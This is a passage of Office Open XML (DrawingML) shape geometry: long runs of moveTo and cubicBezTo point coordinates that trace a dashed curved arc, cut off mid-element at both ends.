                    <a:pt x="1484" y="92"/>
                    <a:pt x="1486" y="93"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1449" y="78"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1455" y="80"/>
                    <a:pt x="1461" y="83"/>
                    <a:pt x="1467" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1469" y="86"/>
                    <a:pt x="1472" y="85"/>
                    <a:pt x="1473" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1473" y="81"/>
                    <a:pt x="1472" y="79"/>
                    <a:pt x="1470" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1464" y="75"/>
                    <a:pt x="1458" y="73"/>
                    <a:pt x="1452" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1450" y="70"/>
                    <a:pt x="1447" y="71"/>
                    <a:pt x="1446" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1446" y="75"/>
                    <a:pt x="1447" y="77"/>
                    <a:pt x="1449" y="78"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1411" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1417" y="66"/>
                    <a:pt x="1424" y="69"/>
                    <a:pt x="1430" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1432" y="72"/>
                    <a:pt x="1434" y="70"/>
                    <a:pt x="1435" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1436" y="66"/>
                    <a:pt x="1435" y="64"/>
                    <a:pt x="1433" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1426" y="61"/>
                    <a:pt x="1420" y="59"/>
                    <a:pt x="1414" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1412" y="56"/>
                    <a:pt x="1409" y="57"/>
                    <a:pt x="1409" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1408" y="61"/>
                    <a:pt x="1409" y="63"/>
                    <a:pt x="1411" y="64"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1373" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1379" y="54"/>
                    <a:pt x="1386" y="56"/>
                    <a:pt x="1392" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1394" y="59"/>
                    <a:pt x="1396" y="57"/>
                    <a:pt x="1397" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1398" y="53"/>
                    <a:pt x="1397" y="51"/>
                    <a:pt x="1395" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1388" y="48"/>
                    <a:pt x="1382" y="46"/>
                    <a:pt x="1375" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1373" y="44"/>
                    <a:pt x="1371" y="45"/>
                    <a:pt x="1370" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1370" y="49"/>
                    <a:pt x="1371" y="51"/>
                    <a:pt x="1373" y="52"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1335" y="41"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1341" y="43"/>
                    <a:pt x="1347" y="45"/>
                    <a:pt x="1354" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1356" y="47"/>
                    <a:pt x="1358" y="46"/>
                    <a:pt x="1359" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1359" y="42"/>
                    <a:pt x="1358" y="39"/>
                    <a:pt x="1356" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1350" y="37"/>
                    <a:pt x="1343" y="35"/>
                    <a:pt x="1337" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1334" y="33"/>
                    <a:pt x="1332" y="34"/>
                    <a:pt x="1332" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1331" y="39"/>
                    <a:pt x="1332" y="41"/>
                    <a:pt x="1335" y="41"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1296" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="34"/>
                    <a:pt x="1309" y="35"/>
                    <a:pt x="1315" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1317" y="37"/>
                    <a:pt x="1320" y="36"/>
                    <a:pt x="1320" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1321" y="31"/>
                    <a:pt x="1319" y="29"/>
                    <a:pt x="1317" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1311" y="27"/>
                    <a:pt x="1304" y="26"/>
                    <a:pt x="1297" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1295" y="24"/>
                    <a:pt x="1293" y="25"/>
                    <a:pt x="1293" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1292" y="30"/>
                    <a:pt x="1294" y="32"/>
                    <a:pt x="1296" y="32"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1257" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1263" y="26"/>
                    <a:pt x="1270" y="27"/>
                    <a:pt x="1276" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1278" y="29"/>
                    <a:pt x="1281" y="27"/>
                    <a:pt x="1281" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="23"/>
                    <a:pt x="1280" y="21"/>
                    <a:pt x="1278" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="19"/>
                    <a:pt x="1265" y="18"/>
                    <a:pt x="1258" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1256" y="16"/>
                    <a:pt x="1254" y="18"/>
                    <a:pt x="1253" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1253" y="22"/>
                    <a:pt x="1254" y="24"/>
                    <a:pt x="1257" y="24"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1217" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1224" y="19"/>
                    <a:pt x="1230" y="20"/>
                    <a:pt x="1237" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1239" y="21"/>
                    <a:pt x="1241" y="20"/>
                    <a:pt x="1242" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1242" y="16"/>
                    <a:pt x="1240" y="14"/>
                    <a:pt x="1238" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1232" y="12"/>
                    <a:pt x="1225" y="11"/>
                    <a:pt x="1218" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1216" y="10"/>
                    <a:pt x="1214" y="11"/>
                    <a:pt x="1214" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1214" y="16"/>
                    <a:pt x="1215" y="18"/>
                    <a:pt x="1217" y="18"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1178" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1184" y="14"/>
                    <a:pt x="1191" y="15"/>
                    <a:pt x="1197" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1200" y="16"/>
                    <a:pt x="1202" y="14"/>
                    <a:pt x="1202" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1202" y="10"/>
                    <a:pt x="1201" y="8"/>
                    <a:pt x="1198" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1192" y="7"/>
                    <a:pt x="1185" y="6"/>
                    <a:pt x="1178" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1176" y="5"/>
                    <a:pt x="1174" y="7"/>
                    <a:pt x="1174" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1174" y="11"/>
                    <a:pt x="1175" y="13"/>
                    <a:pt x="1178" y="13"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1138" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1144" y="10"/>
                    <a:pt x="1151" y="11"/>
                    <a:pt x="1158" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1160" y="12"/>
                    <a:pt x="1162" y="10"/>
                    <a:pt x="1162" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1162" y="6"/>
                    <a:pt x="1161" y="4"/>
                    <a:pt x="1158" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1152" y="3"/>
                    <a:pt x="1145" y="3"/>
                    <a:pt x="1138" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1136" y="2"/>
                    <a:pt x="1134" y="4"/>
                    <a:pt x="1134" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1134" y="8"/>
                    <a:pt x="1136" y="10"/>
                    <a:pt x="1138" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1138" y="10"/>
                    <a:pt x="1138" y="10"/>
                    <a:pt x="1138" y="10"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1098" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1105" y="8"/>
                    <a:pt x="1111" y="9"/>
                    <a:pt x="1118" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1120" y="9"/>
                    <a:pt x="1122" y="7"/>
                    <a:pt x="1122" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1122" y="3"/>
                    <a:pt x="1120" y="1"/>
                    <a:pt x="1118" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1112" y="1"/>
                    <a:pt x="1105" y="0"/>
                    <a:pt x="1098" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1096" y="0"/>
                    <a:pt x="1094" y="2"/>
                    <a:pt x="1094" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1094" y="6"/>
                    <a:pt x="1096" y="8"/>
                    <a:pt x="1098" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1098" y="8"/>
                    <a:pt x="1098" y="8"/>
                    <a:pt x="1098" y="8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1058" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1062" y="8"/>
                    <a:pt x="1066" y="8"/>
                    <a:pt x="1069" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1072" y="8"/>
                    <a:pt x="1075" y="8"/>
                    <a:pt x="1078" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1080" y="8"/>
                    <a:pt x="1082" y="6"/>
                    <a:pt x="1082" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1082" y="2"/>
                    <a:pt x="1080" y="0"/>
                    <a:pt x="1078" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075" y="0"/>
                    <a:pt x="1072" y="0"/>
                    <a:pt x="1069" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1065" y="0"/>
                    <a:pt x="1062" y="0"/>
                    <a:pt x="1058" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1056" y="0"/>
                    <a:pt x="1054" y="2"/>
                    <a:pt x="1054" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1054" y="6"/>
                    <a:pt x="1056" y="8"/>
                    <a:pt x="1058" y="8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1018" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1025" y="9"/>
                    <a:pt x="1031" y="9"/>
                    <a:pt x="1038" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1040" y="8"/>
                    <a:pt x="1042" y="6"/>
                    <a:pt x="1042" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1042" y="2"/>
                    <a:pt x="1040" y="0"/>
                    <a:pt x="1038" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1031" y="1"/>
                    <a:pt x="1024" y="1"/>
                    <a:pt x="1018" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="1"/>
                    <a:pt x="1014" y="3"/>
                    <a:pt x="1014" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1014" y="7"/>
                    <a:pt x="1016" y="9"/>
                    <a:pt x="1018" y="9"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="978" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="985" y="11"/>
                    <a:pt x="992" y="11"/>
                    <a:pt x="998" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1000" y="10"/>
                    <a:pt x="1002" y="8"/>
                    <a:pt x="1002" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1002" y="4"/>
                    <a:pt x="1000" y="2"/>
                    <a:pt x="998" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="991" y="3"/>
                    <a:pt x="984" y="3"/>
                    <a:pt x="978" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="975" y="4"/>
                    <a:pt x="974" y="6"/>
                    <a:pt x="974" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="974" y="10"/>
                    <a:pt x="976" y="12"/>
                    <a:pt x="978" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="978" y="12"/>
                    <a:pt x="978" y="12"/>
                    <a:pt x="978" y="12"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="939" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="945" y="15"/>
                    <a:pt x="952" y="14"/>
                    <a:pt x="959" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="961" y="13"/>
                    <a:pt x="962" y="11"/>
                    <a:pt x="962" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="962" y="7"/>
                    <a:pt x="960" y="5"/>
                    <a:pt x="958" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="951" y="6"/>
                    <a:pt x="944" y="7"/>
                    <a:pt x="938" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="936" y="8"/>
                    <a:pt x="934" y="10"/>
                    <a:pt x="934" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="934" y="15"/>
                    <a:pt x="936" y="16"/>
                    <a:pt x="939" y="16"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="899" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="906" y="20"/>
                    <a:pt x="912" y="19"/>
                    <a:pt x="919" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="921" y="18"/>
                    <a:pt x="923" y="16"/>
                    <a:pt x="922" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="922" y="12"/>
                    <a:pt x="920" y="10"/>
                    <a:pt x="918" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="911" y="11"/>
                    <a:pt x="905" y="12"/>
                    <a:pt x="898" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="896" y="14"/>
                    <a:pt x="894" y="16"/>
                    <a:pt x="895" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="895" y="20"/>
                    <a:pt x="897" y="22"/>
                    <a:pt x="899" y="21"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="860" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="866" y="27"/>
                    <a:pt x="873" y="26"/>
                    <a:pt x="880" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="882" y="24"/>
                    <a:pt x="883" y="22"/>
                    <a:pt x="883" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="882" y="18"/>
                    <a:pt x="880" y="17"/>
                    <a:pt x="878" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="871" y="18"/>
                    <a:pt x="865" y="19"/>
                    <a:pt x="858" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="856" y="21"/>
                    <a:pt x="855" y="23"/>
                    <a:pt x="855" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="856" y="28"/>
                    <a:pt x="858" y="29"/>
                    <a:pt x="860" y="29"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="821" y="37"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="827" y="36"/>
                    <a:pt x="834" y="34"/>
                    <a:pt x="840" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="843" y="32"/>
                    <a:pt x="844" y="30"/>
                    <a:pt x="843" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="843" y="26"/>
                    <a:pt x="841" y="24"/>
                    <a:pt x="839" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="832" y="26"/>
                    <a:pt x="826" y="28"/>
                    <a:pt x="819" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="817" y="30"/>
                    <a:pt x="816" y="32"/>
                    <a:pt x="816" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="817" y="36"/>
                    <a:pt x="819" y="38"/>
                    <a:pt x="821" y="37"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="782" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="789" y="45"/>
                    <a:pt x="795" y="44"/>
                    <a:pt x="802" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="804" y="41"/>
                    <a:pt x="805" y="39"/>
                    <a:pt x="804" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="804" y="35"/>
                    <a:pt x="802" y="34"/>
                    <a:pt x="800" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="793" y="36"/>
                    <a:pt x="787" y="38"/>
                    <a:pt x="780" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="40"/>
                    <a:pt x="777" y="42"/>
                    <a:pt x="777" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="47"/>
                    <a:pt x="780" y="48"/>
                    <a:pt x="782" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="782" y="47"/>
                    <a:pt x="782" y="47"/>
                    <a:pt x="782" y="47"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="744" y="59"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="750" y="57"/>
                    <a:pt x="757" y="55"/>
                    <a:pt x="763" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="52"/>
                    <a:pt x="766" y="50"/>
                    <a:pt x="766" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="46"/>
                    <a:pt x="763" y="44"/>
                    <a:pt x="761" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="754" y="47"/>
                    <a:pt x="748" y="49"/>
                    <a:pt x="742" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="740" y="52"/>
                    <a:pt x="738" y="54"/>
                    <a:pt x="739" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="740" y="58"/>
                    <a:pt x="742" y="59"/>
                    <a:pt x="744" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="744" y="59"/>
                    <a:pt x="744" y="59"/>
                    <a:pt x="744" y="59"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="706" y="72"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="713" y="69"/>
                    <a:pt x="719" y="67"/>
                    <a:pt x="725" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="64"/>
                    <a:pt x="728" y="62"/>
                    <a:pt x="728" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="58"/>
                    <a:pt x="725" y="57"/>
                    <a:pt x="723" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="716" y="60"/>
                    <a:pt x="710" y="62"/>
                    <a:pt x="704" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="702" y="65"/>
                    <a:pt x="700" y="67"/>
                    <a:pt x="701" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="702" y="71"/>
                    <a:pt x="704" y="72"/>
                    <a:pt x="706" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="72"/>
                    <a:pt x="706" y="72"/>
                    <a:pt x="706" y="72"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="669" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="675" y="83"/>
                    <a:pt x="681" y="81"/>
                    <a:pt x="688" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="690" y="78"/>
                    <a:pt x="691" y="75"/>
                    <a:pt x="690" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="71"/>
                    <a:pt x="687" y="70"/>
                    <a:pt x="685" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="679" y="74"/>
                    <a:pt x="672" y="76"/>
                    <a:pt x="666" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="79"/>
                    <a:pt x="663" y="82"/>
                    <a:pt x="664" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="665" y="86"/>
                    <a:pt x="667" y="87"/>
                    <a:pt x="669" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="669" y="86"/>
                    <a:pt x="669" y="86"/>
                    <a:pt x="669" y="86"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="633" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="639" y="99"/>
                    <a:pt x="645" y="96"/>
                    <a:pt x="651" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="93"/>
                    <a:pt x="654" y="90"/>
                    <a:pt x="653" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="652" y="86"/>
                    <a:pt x="650" y="85"/>
                    <a:pt x="648" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="642" y="89"/>
                    <a:pt x="635" y="92"/>
                    <a:pt x="629" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="95"/>
                    <a:pt x="626" y="98"/>
                    <a:pt x="627" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="628" y="102"/>
                    <a:pt x="631" y="103"/>
                    <a:pt x="633" y="102"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="597" y="119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="603" y="116"/>
                    <a:pt x="609" y="113"/>
                    <a:pt x="615" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="617" y="109"/>
                    <a:pt x="617" y="107"/>
                    <a:pt x="616" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="103"/>
                    <a:pt x="613" y="102"/>
                    <a:pt x="611" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="605" y="106"/>
                    <a:pt x="599" y="109"/>
                    <a:pt x="593" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="591" y="113"/>
                    <a:pt x="590" y="115"/>
                    <a:pt x="591" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="592" y="119"/>
                    <a:pt x="595" y="120"/>
                    <a:pt x="597" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="597" y="119"/>
                    <a:pt x="597" y="119"/>
                    <a:pt x="597" y="119"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="561" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="567" y="134"/>
                    <a:pt x="573" y="131"/>
                    <a:pt x="579" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="581" y="127"/>
                    <a:pt x="582" y="124"/>
                    <a:pt x="581" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="120"/>
                    <a:pt x="577" y="120"/>
                    <a:pt x="575" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="569" y="124"/>
                    <a:pt x="563" y="127"/>
                    <a:pt x="558" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="131"/>
                    <a:pt x="555" y="134"/>
                    <a:pt x="556" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="137"/>
                    <a:pt x="559" y="138"/>
                    <a:pt x="561" y="137"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="527" y="157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="533" y="153"/>
                    <a:pt x="538" y="150"/>
                    <a:pt x="544" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="546" y="146"/>
                    <a:pt x="547" y="143"/>
                    <a:pt x="546" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="139"/>
                    <a:pt x="542" y="139"/>
                    <a:pt x="540" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="534" y="143"/>
                    <a:pt x="529" y="147"/>
                    <a:pt x="523" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="151"/>
                    <a:pt x="520" y="154"/>
                    <a:pt x="521" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="523" y="157"/>
                    <a:pt x="525" y="158"/>
                    <a:pt x="527" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="527" y="157"/>
                    <a:pt x="527" y="157"/>
                    <a:pt x="527" y="157"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="493" y="178"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="174"/>
                    <a:pt x="504" y="171"/>
                    <a:pt x="510" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="512" y="166"/>
                    <a:pt x="512" y="164"/>
                    <a:pt x="511" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="160"/>
                    <a:pt x="508" y="159"/>
                    <a:pt x="506" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500" y="164"/>
                    <a:pt x="494" y="168"/>
                    <a:pt x="489" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="172"/>
                    <a:pt x="486" y="175"/>
                    <a:pt x="488" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489" y="179"/>
                    <a:pt x="491" y="179"/>
